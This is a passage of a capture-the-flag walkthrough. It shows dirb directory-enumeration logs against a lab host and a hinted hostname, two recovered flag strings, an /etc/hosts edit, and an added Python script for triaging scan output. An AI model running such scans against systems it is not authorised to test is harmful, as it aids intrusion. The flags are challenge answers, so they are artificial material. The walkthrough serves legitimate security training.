==> DIRECTORY: http://192.168.1.22/plugins/admin/plugins/1/                    
+ http://192.168.1.22/plugins/admin/plugins/index.php (CODE:200|SIZE:0)        
                                                                               
---- Entering directory: http://192.168.1.22/search/admin/search/ ----
==> DIRECTORY: http://192.168.1.22/search/admin/search/1/                      
+ http://192.168.1.22/search/admin/search/index.php (CODE:200|SIZE:0)          
                                                                               
---- Entering directory: http://192.168.1.22/support/admin/support/ ----
==> DIRECTORY: http://192.168.1.22/support/admin/support/1/                    
+ http://192.168.1.22/support/admin/support/index.php (CODE:200|SIZE:0)        
                                                                               
---- Entering directory: http://192.168.1.22/tag/admin/tag/ ----
==> DIRECTORY: http://192.168.1.22/tag/admin/tag/1/                            
+ http://192.168.1.22/tag/admin/tag/index.php (CODE:200|SIZE:0)                
                                                                               
---- Entering directory: http://192.168.1.22/themes/admin/themes/ ----
==> DIRECTORY: http://192.168.1.22/themes/admin/themes/1/                      
+ http://192.168.1.22/themes/admin/themes/index.php (CODE:200|SIZE:0)          
                                                                               
---- Entering directory: http://192.168.1.22/trackback/admin/trackback/ ----
==> DIRECTORY: http://192.168.1.22/trackback/admin/trackback/1/                
+ http://192.168.1.22/trackback/admin/trackback/index.php (CODE:200|SIZE:0)    
                                                                               
---- Entering directory: http://192.168.1.22/wp-admin/admin/wp-admin/ ----
==> DIRECTORY: http://192.168.1.22/wp-admin/admin/wp-admin/1/                  
+ http://192.168.1.22/wp-admin/admin/wp-admin/index.php (CODE:200|SIZE:0)      
                                                                               
---- Entering directory: http://192.168.1.22/wp-content/admin/wp-content/ ----
==> DIRECTORY: http://192.168.1.22/wp-content/admin/wp-content/1/              
+ http://192.168.1.22/wp-content/admin/wp-content/index.php (CODE:200|SIZE:0)  
                                                                               
---- Entering directory: http://192.168.1.22/wp-includes/admin/wp-includes/ ----
==> DIRECTORY: http://192.168.1.22/wp-includes/admin/wp-includes/1/            
+ http://192.168.1.22/wp-includes/admin/wp-includes/index.php (CODE:200|SIZE:0)
                                                                               
---- Entering directory: http://192.168.1.22/xmlrpc.php/admin/xmlrpc.php/ ----
==> DIRECTORY: http://192.168.1.22/xmlrpc.php/admin/xmlrpc.php/1/              
+ http://192.168.1.22/xmlrpc.php/admin/xmlrpc.php/index.php (CODE:200|SIZE:0)  
                                                                               
---- Entering directory: http://192.168.1.22/archive/admin/archive/1/ ----
==> DIRECTORY: http://192.168.1.22/archive/admin/archive/1/2/                  
+ http://192.168.1.22/archive/admin/archive/1/index.php (CODE:200|SIZE:0)      
                                                                               
---- Entering directory: http://192.168.1.22/blog/admin/blog/1/ ----
==> DIRECTORY: http://192.168.1.22/blog/admin/blog/1/2/                        
+ http://192.168.1.22/blog/admin/blog/1/index.php (CODE:200|SIZE:0)            
                                                                               
---- Entering directory: http://192.168.1.22/contact/admin/contact/1/ ----
==> DIRECTORY: http://192.168.1.22/contact/admin/contact/1/2/                  
+ http://192.168.1.22/contact/admin/contact/1/index.php (CODE:200|SIZE:0)      
                                                                               
---- Entering directory: http://192.168.1.22/feed/admin/feed/1/ ----
==> DIRECTORY: http://192.168.1.22/feed/admin/feed/1/2/                        
+ http://192.168.1.22/feed/admin/feed/1/index.php (CODE:200|SIZE:0)            
                                                                               
---- Entering directory: http://192.168.1.22/mint/admin/mint/1/ ----
==> DIRECTORY: http://192.168.1.22/mint/admin/mint/1/2/                        
+ http://192.168.1.22/mint/admin/mint/1/index.php (CODE:200|SIZE:0)            
                                                                               
---- Entering directory: http://192.168.1.22/plugins/admin/plugins/1/ ----
==> DIRECTORY: http://192.168.1.22/plugins/admin/plugins/1/2/                  
+ http://192.168.1.22/plugins/admin/plugins/1/index.php (CODE:200|SIZE:0)      
                                                                               
---- Entering directory: http://192.168.1.22/search/admin/search/1/ ----
==> DIRECTORY: http://192.168.1.22/search/admin/search/1/2/                    
+ http://192.168.1.22/search/admin/search/1/index.php (CODE:200|SIZE:0)        
                                                                               
---- Entering directory: http://192.168.1.22/support/admin/support/1/ ----
==> DIRECTORY: http://192.168.1.22/support/admin/support/1/2/                  
+ http://192.168.1.22/support/admin/support/1/index.php (CODE:200|SIZE:0)      
                                                                               
---- Entering directory: http://192.168.1.22/tag/admin/tag/1/ ----
==> DIRECTORY: http://192.168.1.22/tag/admin/tag/1/2/                          
+ http://192.168.1.22/tag/admin/tag/1/index.php (CODE:200|SIZE:0)              
                                                                               
---- Entering directory: http://192.168.1.22/themes/admin/themes/1/ ----
==> DIRECTORY: http://192.168.1.22/themes/admin/themes/1/2/                    
+ http://192.168.1.22/themes/admin/themes/1/index.php (CODE:200|SIZE:0)        
                                                                               
---- Entering directory: http://192.168.1.22/trackback/admin/trackback/1/ ----
==> DIRECTORY: http://192.168.1.22/trackback/admin/trackback/1/2/              
+ http://192.168.1.22/trackback/admin/trackback/1/index.php (CODE:200|SIZE:0)  
                                                                               
---- Entering directory: http://192.168.1.22/wp-admin/admin/wp-admin/1/ ----
==> DIRECTORY: http://192.168.1.22/wp-admin/admin/wp-admin/1/2/                
+ http://192.168.1.22/wp-admin/admin/wp-admin/1/index.php (CODE:200|SIZE:0)    
                                                                               
---- Entering directory: http://192.168.1.22/wp-content/admin/wp-content/1/ ----
==> DIRECTORY: http://192.168.1.22/wp-content/admin/wp-content/1/2/            
+ http://192.168.1.22/wp-content/admin/wp-content/1/index.php (CODE:200|SIZE:0)
                                                                               
---- Entering directory: http://192.168.1.22/wp-includes/admin/wp-includes/1/ ----
==> DIRECTORY: http://192.168.1.22/wp-includes/admin/wp-includes/1/2/          
+ http://192.168.1.22/wp-includes/admin/wp-includes/1/index.php (CODE:200|SIZE:0)
                                                                               
---- Entering directory: http://192.168.1.22/xmlrpc.php/admin/xmlrpc.php/1/ ----
==> DIRECTORY: http://192.168.1.22/xmlrpc.php/admin/xmlrpc.php/1/2/            
+ http://192.168.1.22/xmlrpc.php/admin/xmlrpc.php/1/index.php (CODE:200|SIZE:0)
                                                                               
---- Entering directory: http://192.168.1.22/archive/admin/archive/1/2/ ----
+ http://192.168.1.22/archive/admin/archive/1/2/index.php (CODE:200|SIZE:0)    
                                                                               
---- Entering directory: http://192.168.1.22/blog/admin/blog/1/2/ ----
+ http://192.168.1.22/blog/admin/blog/1/2/index.php (CODE:200|SIZE:0)          
                                                                               
---- Entering directory: http://192.168.1.22/contact/admin/contact/1/2/ ----
+ http://192.168.1.22/contact/admin/contact/1/2/index.php (CODE:200|SIZE:0)    
                                                                               
---- Entering directory: http://192.168.1.22/feed/admin/feed/1/2/ ----
+ http://192.168.1.22/feed/admin/feed/1/2/index.php (CODE:200|SIZE:0)          
                                                                               
---- Entering directory: http://192.168.1.22/mint/admin/mint/1/2/ ----
+ http://192.168.1.22/mint/admin/mint/1/2/index.php (CODE:200|SIZE:0)          
                                                                               
---- Entering directory: http://192.168.1.22/plugins/admin/plugins/1/2/ ----
+ http://192.168.1.22/plugins/admin/plugins/1/2/index.php (CODE:200|SIZE:0)    
                                                                               
---- Entering directory: http://192.168.1.22/search/admin/search/1/2/ ----
+ http://192.168.1.22/search/admin/search/1/2/index.php (CODE:200|SIZE:0)      
                                                                               
---- Entering directory: http://192.168.1.22/support/admin/support/1/2/ ----
+ http://192.168.1.22/support/admin/support/1/2/index.php (CODE:200|SIZE:0)    
                                                                               
---- Entering directory: http://192.168.1.22/tag/admin/tag/1/2/ ----
+ http://192.168.1.22/tag/admin/tag/1/2/index.php (CODE:200|SIZE:0)            
                                                                               
---- Entering directory: http://192.168.1.22/themes/admin/themes/1/2/ ----
+ http://192.168.1.22/themes/admin/themes/1/2/index.php (CODE:200|SIZE:0)      
                                                                               
---- Entering directory: http://192.168.1.22/trackback/admin/trackback/1/2/ ----
+ http://192.168.1.22/trackback/admin/trackback/1/2/index.php (CODE:200|SIZE:0)
                                                                               
---- Entering directory: http://192.168.1.22/wp-admin/admin/wp-admin/1/2/ ----
+ http://192.168.1.22/wp-admin/admin/wp-admin/1/2/index.php (CODE:200|SIZE:0)  
                                                                               
---- Entering directory: http://192.168.1.22/wp-content/admin/wp-content/1/2/ ----
+ http://192.168.1.22/wp-content/admin/wp-content/1/2/index.php (CODE:200|SIZE:0)
                                                                               
---- Entering directory: http://192.168.1.22/wp-includes/admin/wp-includes/1/2/ ----
+ http://192.168.1.22/wp-includes/admin/wp-includes/1/2/index.php (CODE:200|SIZE:0)
                                                                               
---- Entering directory: http://192.168.1.22/xmlrpc.php/admin/xmlrpc.php/1/2/ ----
+ http://192.168.1.22/xmlrpc.php/admin/xmlrpc.php/1/2/index.php (CODE:200|SIZE:0)
                                                                               
-----------------
END_TIME: Fri May 12 12:42:12 2017
DOWNLOADED: 696412 - FOUND: 154

After filtering out the empty directories and pages and reviewing the responses that came back, I catch the first flag at http://192.168.1.22/control/index.html. The flag can be obtained either with the wget command or via view-source:http://192.168.1.22/control/index.html.

<!-- FL46_1:urh8fu3i039rfoy254sx2xtrs5wc6767w -->

In addition, the address D0Not5topMe.ctf is given to us in a comment line.

 <div class="fluid-ratio-resize"></div>
            <!-- M3gusta said he hasn't had time to get this w0rKING.
            Don't think he's quite in the 20n3 these days since his MadBro made that 7r4n5f3r, Just Couldnt [email protected] Da D0Not5topMe.ctf --!>            

 </div>
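The filtering step mentioned before the first flag (setting aside empty pages in the dirb output) can be scripted. The following is an added example, not part of the original walkthrough: the function names and the repeat threshold are assumptions, and the sample lines are copied from the two dirb runs on this page.

```python
import re
from collections import Counter
from typing import NamedTuple

# Abridged sample: lines copied from the two dirb runs shown on this page.
SAMPLE = """\
---- Scanning URL: http://192.168.1.22/ ----
+ http://192.168.1.22/index.html (CODE:200|SIZE:211)

---- Entering directory: http://192.168.1.22/mint/admin/mint/ ----
+ http://192.168.1.22/mint/admin/mint/index.php (CODE:200|SIZE:0)

---- Scanning URL: http://D0Not5topMe.ctf/ ----
+ http://D0Not5topMe.ctf/index.php (CODE:200|SIZE:12659)
+ http://D0Not5topMe.ctf/server-status (CODE:403|SIZE:222)
+ http://D0Not5topMe.ctf/web.config (CODE:200|SIZE:1086)

---- Entering directory: http://D0Not5topMe.ctf/adm/ ----
+ http://D0Not5topMe.ctf/adm/index.php (CODE:302|SIZE:0)

---- Entering directory: http://D0Not5topMe.ctf/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://D0Not5topMe.ctf/cache/ ----
+ http://D0Not5topMe.ctf/cache/index.htm (CODE:200|SIZE:169)

---- Entering directory: http://D0Not5topMe.ctf/files/ ----
+ http://D0Not5topMe.ctf/files/index.htm (CODE:200|SIZE:169)

---- Entering directory: http://D0Not5topMe.ctf/store/ ----
+ http://D0Not5topMe.ctf/store/index.htm (CODE:200|SIZE:169)

---- Entering directory: http://D0Not5topMe.ctf/includes/hooks/ ----
+ http://D0Not5topMe.ctf/includes/hooks/index.php (CODE:200|SIZE:0)

---- Entering directory: http://D0Not5topMe.ctf/vendor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
"""

HIT_RE = re.compile(r"^\+ (\S+) \(CODE:(\d{3})\|SIZE:(\d+)\)$")
ENTER_RE = re.compile(r"^---- Entering directory: (\S+) ----$")
LISTABLE_RE = re.compile(r"^\(!\) WARNING: Directory IS LISTABLE")


class Hit(NamedTuple):
    url: str
    code: int
    size: int


def parse_dirb(text):
    """Return (hits, listable_dirs) from raw dirb output."""
    hits, listable, current_dir = [], [], None
    for raw in text.splitlines():
        line = raw.rstrip()  # dirb pads lines with trailing spaces
        m = ENTER_RE.match(line)
        if m:
            current_dir = m.group(1)
            continue
        # The LISTABLE warning refers to the directory dirb just entered.
        if LISTABLE_RE.match(line) and current_dir:
            listable.append(current_dir)
            continue
        m = HIT_RE.match(line)
        if m:
            hits.append(Hit(m.group(1), int(m.group(2)), int(m.group(3))))
    return hits, listable


def triage(hits, repeat_threshold=3):
    """Drop empty bodies and stock placeholder pages.

    A placeholder is assumed to be a file name that comes back with the
    identical size in at least repeat_threshold directories (for example
    the 169-byte index.htm files in the scan above).
    """
    def key(h):
        return (h.url.rsplit("/", 1)[-1], h.size)

    counts = Counter(key(h) for h in hits)
    return [h for h in hits
            if h.size > 0 and counts[key(h)] < repeat_threshold]


if __name__ == "__main__":
    hits, listable = parse_dirb(SAMPLE)
    print("Worth a manual look:")
    for h in triage(hits):
        print(f"  {h.code} {h.size:>6} {h.url}")
    print("Directory listing enabled:")
    for d in listable:
        print(f"  {d}")
```

On a server you administer, every entry in the second list is a directory where auto-indexing should be switched off, and a readable `web.config` or similar file in the first list is worth checking for exposed settings.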

While examining the site, I look at http://192.168.1.22/control/js/README.MadBro, and its contents are:

###########################################################
# MadBro MadBro MadBro MadBro MadBro MadBro MadBro MadBro #
# M4K3 5UR3 2 S3TUP Y0UR /3TC/H05T5 N3XT T1M3 L0053R...   #
# 1T'5 D0Not5topMe.ctf !!!!                               #
# 1M 00T4 H33R..                                          #
# MadBro MadBro MadBro MadBro MadBro MadBro MadBro MadBro #
###########################################################

                FL101110_10:111101011101
                1r101010q10svdfsxk1001i1
                11ry100f10srtr1100010h10
FL46_2:30931r42q2svdfsxk9i13ry4f2srtr98h2

As the hint says, I add D0Not5topMe.ctf to my /etc/hosts file.

I run a directory scan against the new address, again with dirb.

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri May 12 13:26:41 2017
URL_BASE: http://D0Not5topMe.ctf/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://D0Not5topMe.ctf/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/adm/                                     
==> DIRECTORY: http://D0Not5topMe.ctf/assets/                                  
==> DIRECTORY: http://D0Not5topMe.ctf/bin/                                     
==> DIRECTORY: http://D0Not5topMe.ctf/cache/                                   
==> DIRECTORY: http://D0Not5topMe.ctf/config/                                  
==> DIRECTORY: http://D0Not5topMe.ctf/docs/                                    
==> DIRECTORY: http://D0Not5topMe.ctf/download/                                
==> DIRECTORY: http://D0Not5topMe.ctf/ext/                                     
==> DIRECTORY: http://D0Not5topMe.ctf/files/                                   
==> DIRECTORY: http://D0Not5topMe.ctf/images/                                  
==> DIRECTORY: http://D0Not5topMe.ctf/includes/                                
+ http://D0Not5topMe.ctf/index.php (CODE:200|SIZE:12659)                       
==> DIRECTORY: http://D0Not5topMe.ctf/language/                                
==> DIRECTORY: http://D0Not5topMe.ctf/manual/                                  
==> DIRECTORY: http://D0Not5topMe.ctf/phpbb/                                   
==> DIRECTORY: http://D0Not5topMe.ctf/phpBB3/                                  
+ http://D0Not5topMe.ctf/server-status (CODE:403|SIZE:222)                     
==> DIRECTORY: http://D0Not5topMe.ctf/store/                                   
==> DIRECTORY: http://D0Not5topMe.ctf/styles/                                  
==> DIRECTORY: http://D0Not5topMe.ctf/vendor/                                  
+ http://D0Not5topMe.ctf/web.config (CODE:200|SIZE:1086)                       
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/adm/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/adm/images/                              
+ http://D0Not5topMe.ctf/adm/index.php (CODE:302|SIZE:0)                       
==> DIRECTORY: http://D0Not5topMe.ctf/adm/style/                               
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/bin/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/cache/ ----
+ http://D0Not5topMe.ctf/cache/index.htm (CODE:200|SIZE:169)                   
==> DIRECTORY: http://D0Not5topMe.ctf/cache/installer/                         
==> DIRECTORY: http://D0Not5topMe.ctf/cache/production/                        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/docs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/download/ ----
+ http://D0Not5topMe.ctf/download/index.htm (CODE:200|SIZE:169)                
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/ext/ ----
+ http://D0Not5topMe.ctf/ext/index.htm (CODE:200|SIZE:169)                     
==> DIRECTORY: http://D0Not5topMe.ctf/ext/phpbb/                               
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/files/ ----
+ http://D0Not5topMe.ctf/files/index.htm (CODE:200|SIZE:169)                   
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/images/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/images/avatars/                          
==> DIRECTORY: http://D0Not5topMe.ctf/images/icons/                            
+ http://D0Not5topMe.ctf/images/index.htm (CODE:200|SIZE:169)                  
==> DIRECTORY: http://D0Not5topMe.ctf/images/ranks/                            
==> DIRECTORY: http://D0Not5topMe.ctf/images/smilies/                          
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/includes/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/includes/acp/                            
==> DIRECTORY: http://D0Not5topMe.ctf/includes/diff/                           
==> DIRECTORY: http://D0Not5topMe.ctf/includes/hooks/                          
+ http://D0Not5topMe.ctf/includes/index.htm (CODE:200|SIZE:169)                
==> DIRECTORY: http://D0Not5topMe.ctf/includes/mcp/                            
==> DIRECTORY: http://D0Not5topMe.ctf/includes/ucp/                            
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/language/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/language/en/                             
+ http://D0Not5topMe.ctf/language/index.htm (CODE:200|SIZE:169)                
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/manual/da/                               
==> DIRECTORY: http://D0Not5topMe.ctf/manual/de/                               
==> DIRECTORY: http://D0Not5topMe.ctf/manual/en/                               
==> DIRECTORY: http://D0Not5topMe.ctf/manual/es/                               
==> DIRECTORY: http://D0Not5topMe.ctf/manual/fr/                               
==> DIRECTORY: http://D0Not5topMe.ctf/manual/images/                           
+ http://D0Not5topMe.ctf/manual/index.html (CODE:200|SIZE:626)                 
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ja/                               
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ko/                               
==> DIRECTORY: http://D0Not5topMe.ctf/manual/style/                            
==> DIRECTORY: http://D0Not5topMe.ctf/manual/tr/                               
==> DIRECTORY: http://D0Not5topMe.ctf/manual/zh-cn/                            
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/phpbb/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/phpBB3/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/store/ ----
+ http://D0Not5topMe.ctf/store/index.htm (CODE:200|SIZE:169)                   
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/styles/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/vendor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/adm/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/adm/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/cache/installer/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/cache/production/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/ext/phpbb/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/images/avatars/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/images/avatars/gallery/                  
+ http://D0Not5topMe.ctf/images/avatars/index.htm (CODE:200|SIZE:169)          
==> DIRECTORY: http://D0Not5topMe.ctf/images/avatars/upload/                   
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/images/icons/ ----
+ http://D0Not5topMe.ctf/images/icons/index.htm (CODE:200|SIZE:169)            
==> DIRECTORY: http://D0Not5topMe.ctf/images/icons/misc/                       
==> DIRECTORY: http://D0Not5topMe.ctf/images/icons/smile/                      
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/images/ranks/ ----
+ http://D0Not5topMe.ctf/images/ranks/index.htm (CODE:200|SIZE:169)            
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/images/smilies/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/includes/acp/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/includes/diff/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/includes/hooks/ ----
+ http://D0Not5topMe.ctf/includes/hooks/index.php (CODE:200|SIZE:0)            
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/includes/mcp/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/includes/ucp/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/language/en/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/language/en/acp/                         
==> DIRECTORY: http://D0Not5topMe.ctf/language/en/email/                       
==> DIRECTORY: http://D0Not5topMe.ctf/language/en/help/                        
+ http://D0Not5topMe.ctf/language/en/index.htm (CODE:200|SIZE:169)             
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/da/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/manual/da/developer/                     
==> DIRECTORY: http://D0Not5topMe.ctf/manual/da/faq/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/da/howto/                         
+ http://D0Not5topMe.ctf/manual/da/index.html (CODE:200|SIZE:9041)             
==> DIRECTORY: http://D0Not5topMe.ctf/manual/da/misc/                          
==> DIRECTORY: http://D0Not5topMe.ctf/manual/da/mod/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/da/programs/                      
==> DIRECTORY: http://D0Not5topMe.ctf/manual/da/ssl/                           
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/de/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/manual/de/developer/                     
==> DIRECTORY: http://D0Not5topMe.ctf/manual/de/faq/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/de/howto/                         
+ http://D0Not5topMe.ctf/manual/de/index.html (CODE:200|SIZE:9290)             
==> DIRECTORY: http://D0Not5topMe.ctf/manual/de/misc/                          
==> DIRECTORY: http://D0Not5topMe.ctf/manual/de/mod/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/de/programs/                      
==> DIRECTORY: http://D0Not5topMe.ctf/manual/de/ssl/                           
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/en/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/manual/en/developer/                     
==> DIRECTORY: http://D0Not5topMe.ctf/manual/en/faq/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/en/howto/                         
+ http://D0Not5topMe.ctf/manual/en/index.html (CODE:200|SIZE:9206)             
==> DIRECTORY: http://D0Not5topMe.ctf/manual/en/misc/                          
==> DIRECTORY: http://D0Not5topMe.ctf/manual/en/mod/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/en/programs/                      
==> DIRECTORY: http://D0Not5topMe.ctf/manual/en/ssl/                           
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/es/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/manual/es/developer/                     
==> DIRECTORY: http://D0Not5topMe.ctf/manual/es/faq/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/es/howto/                         
+ http://D0Not5topMe.ctf/manual/es/index.html (CODE:200|SIZE:9255)             
==> DIRECTORY: http://D0Not5topMe.ctf/manual/es/misc/                          
==> DIRECTORY: http://D0Not5topMe.ctf/manual/es/mod/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/es/programs/                      
==> DIRECTORY: http://D0Not5topMe.ctf/manual/es/ssl/                           
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/fr/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/manual/fr/developer/                     
==> DIRECTORY: http://D0Not5topMe.ctf/manual/fr/faq/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/fr/howto/                         
+ http://D0Not5topMe.ctf/manual/fr/index.html (CODE:200|SIZE:9479)             
==> DIRECTORY: http://D0Not5topMe.ctf/manual/fr/misc/                          
==> DIRECTORY: http://D0Not5topMe.ctf/manual/fr/mod/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/fr/programs/                      
==> DIRECTORY: http://D0Not5topMe.ctf/manual/fr/ssl/                           
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ja/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ja/developer/                     
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ja/faq/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ja/howto/                         
+ http://D0Not5topMe.ctf/manual/ja/index.html (CODE:200|SIZE:9649)             
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ja/misc/                          
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ja/mod/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ja/programs/                      
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ja/ssl/                           
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/ko/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ko/developer/                     
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ko/faq/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ko/howto/                         
+ http://D0Not5topMe.ctf/manual/ko/index.html (CODE:200|SIZE:8513)             
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ko/misc/                          
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ko/mod/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ko/programs/                      
==> DIRECTORY: http://D0Not5topMe.ctf/manual/ko/ssl/                           
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/tr/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/manual/tr/developer/                     
==> DIRECTORY: http://D0Not5topMe.ctf/manual/tr/faq/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/tr/howto/                         
+ http://D0Not5topMe.ctf/manual/tr/index.html (CODE:200|SIZE:9416)             
==> DIRECTORY: http://D0Not5topMe.ctf/manual/tr/misc/                          
==> DIRECTORY: http://D0Not5topMe.ctf/manual/tr/mod/                           
==> DIRECTORY: http://D0Not5topMe.ctf/manual/tr/programs/                      
==> DIRECTORY: http://D0Not5topMe.ctf/manual/tr/ssl/                           
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/manual/zh-cn/ ----
==> DIRECTORY: http://D0Not5topMe.ctf/manual/zh-cn/developer/                  
==> DIRECTORY: http://D0Not5topMe.ctf/manual/zh-cn/faq/                        
==> DIRECTORY: http://D0Not5topMe.ctf/manual/zh-cn/howto/                      
+ http://D0Not5topMe.ctf/manual/zh-cn/index.html (CODE:200|SIZE:8884)          
==> DIRECTORY: http://D0Not5topMe.ctf/manual/zh-cn/misc/                       
==> DIRECTORY: http://D0Not5topMe.ctf/manual/zh-cn/mod/                        
==> DIRECTORY: http://D0Not5topMe.ctf/manual/zh-cn/programs/                   
==> DIRECTORY: http://D0Not5topMe.ctf/manual/zh-cn/ssl/                        
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/images/avatars/gallery/ ----
+ http://D0Not5topMe.ctf/images/avatars/gallery/index.htm (CODE:200|SIZE:169)  
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/images/avatars/upload/ ----
+ http://D0Not5topMe.ctf/images/avatars/upload/index.htm (CODE:200|SIZE:169)   
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/images/icons/misc/ ----
+ http://D0Not5topMe.ctf/images/icons/misc/index.htm (CODE:200|SIZE:169)       
                                                                               
---- Entering directory: http://D0Not5topMe.ctf/images/icons/smile/ ----
